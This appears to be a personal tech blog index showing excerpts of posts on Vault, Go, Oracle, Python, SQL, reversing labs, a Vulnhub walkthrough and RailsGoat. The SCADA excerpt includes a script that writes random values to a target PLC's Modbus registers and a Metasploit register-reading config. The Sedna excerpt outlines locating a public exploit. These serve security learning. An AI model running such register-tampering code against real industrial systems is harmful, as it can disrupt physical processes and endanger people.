HashiCorp Vault Research

Nice introduction: https://mycodesmells.com/post/introduction-to-vault
Fun write-up: https://www.davidbegin.com/cubbyhole-backend-and-response-wrapping/
Token info: https://www.vaultproject.io/docs/concepts/tokens.html
Cool dev implementation series with OSX and LastPass:
https://blog.alanthatcher.io/fun-and-profit-with-vault-2/
https://blog.alanthatcher.io/fun-and-profit-with-vault-part-2/
https://blog.alanthatcher.io/fun-and-profit-with-vault-part-3/
Single-use implementation: https://www.slalom.com/thinking/managing-secrets-using-hashicorp-vault
How-to on Ubuntu: https://www.digitalocean.com/community/tutorials/how-to-securely-manage-secrets-with-hashicorp-vault-on-ubuntu-16-04

July 2, 2018 · Jayson Grace

Golang Notes

Installation

Ubuntu:

    dl_link='https://dl.google.com/go/go1.15.7.linux-amd64.tar.gz'
    wget -c "$dl_link" -O - | sudo tar -xz -C /usr/local
    echo "" >> ~/.bashrc
    echo '# Golang exports' >> ~/.bashrc
    echo 'export PATH="$PATH:/usr/local/go/bin"' >> ~/.bashrc
    echo 'export GOPATH=$HOME/go' >> ~/.bashrc
    echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
    source ~/.bashrc
    # Test:
    go version

Resource: https://golang.org/doc/install

MacOS:

Install it:

    brew install golang

Add the following to ~/.zshrc:

    export GOPATH=$HOME/programs/go
    # Set GOROOT since we're using brew
    export GOROOT="$(brew --prefix golang)/libexec"
    # Add go to PATH - so we can run executables from anywhere
    export PATH="$PATH:${GOPATH}/bin:${GOROOT}/bin"

Resource: https://medium....

June 18, 2018 · Jayson Grace

Reversing Notes

Environment Setup
VMware everything in a VLAN.
REMnux Linux box - has things like iptables rules which accept traffic from any IP that connects to it, and a fake DNS tool.

Process Monitor: Useful for seeing what processes are spawned by a given running program. Used to get real-time information. Process Hacker is an open source alternative.

Process Explorer: Determine what files, DLLs, and registry keys are associated with open processes....

April 24, 2018 · Jayson Grace

Interfacing with Oracle DBs

This was so much of a pain in the ass to figure out that I decided that I would compile a whole post specifically around useful information for this topic. To get started, download SQLDeveloper through Oracle’s site (you’ll need to register). So far I’ve tested this on OSX.

Establishing a connection:
Under the Connections tab, click the green plus button
Specify Basic for the connection type
Put in the Connection name, Username, Password, Hostname, and Port
For SID, put in the hostname without the domain....

April 19, 2018 · Jayson Grace

SCADA Security Notes

Modbus write random registers:

    from pymodbus.client.sync import ModbusTcpClient
    import multiprocessing
    import random
    from multiprocessing import TimeoutError

    client = ModbusTcpClient('[target]')
    client.connect()

    def write(reg):
        client.write_register(reg+1, random.randint(1, 100))
        print('reg:' + str(reg))

    if __name__ == '__main__':
        while True:
            p = multiprocessing.Pool(2)
            try:
                p.map(write, [x for x in range(20)])
            except TimeoutError:
                pass
            except Exception as e:
                print(e)
                exit()
        client.close()

Read and write data to a PLC with metasploit:

    use auxiliary/scanner/scada/modbusclient
    set DATA_ADDRESS 1
    set RHOST [target]
    set ACTION READ_REGISTERS
    set NUMBER 19
    run

April 7, 2018 · Jayson Grace

Python Notes

This will encompass things that I find useful and end up looking up later when I haven’t coded in a while.

Useful functions

Read file line-by-line and print each line:

    def print_lines(file):
        with open(file) as f:
            for line in f:
                print(line)

Read file into list:

    def return_list(file):
        with open(file) as f:
            list = f.readlines()
        return list

Remove line from a file containing a specified string:

    def remove_line_containing_string(file):
        f = open(file, 'r')
        contents = f....

January 3, 2018 · Jayson Grace

SQL Cheatsheet

Generic

Update field:

    UPDATE table_name SET column1 = value1, column2 = value2, ... WHERE condition;

Get first row of data from table:

    SELECT * FROM <table_name> LIMIT 1;

Single-line comment:

    -- stuff to comment out

Multi-line comment:

    /** stuff to comment out **/

Delete the last n rows from a table:

    DELETE FROM `table` WHERE `table`.`tableID` in (SELECT TOP 500 tableID FROM table ORDER BY tableID DESC)

Delete the first n rows from a table:

    DELETE FROM `table` WHERE `table`....

November 29, 2017 · Jayson Grace

Modernizing Techvomit

In case it wasn’t obvious, this site runs on Ghost. I made this decision a couple of years ago on a 4 hour plane ride when I was bored, and wanted to kill two birds with one stone: start learning how some of the AWS services worked, and get a website going. At the time I didn’t really make the site very easy to maintain, and had to learn a couple of lessons over the years as a result....

October 2, 2017 · Jayson Grace

Vulnhub - Sedna

These are my notes from running through the Sedna vulnerable VM. Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities. Observe /license.txt - it will inform us that the target web application is running BuilderEngine. Search for an exploit we can use: searchsploit builderengine View the source for the exploit: searchsploit -x 40390 Copy the exploit code into exploit....

March 27, 2017 · Jayson Grace

RailsGoat Notes

This is the tutorial for the talk I gave on Web Application Vulnerabilities at the RubiABQ meetup on March 8th, 2017. Legal The below is not intended to provide details on how to compromise other people’s web sites and applications. The purpose is to inform developers on how to protect themselves from malicious users and attackers. The tools and methods listed should only be used on sites & applications which you directly own or have permission in writing to work on....

March 9, 2017 · Jayson Grace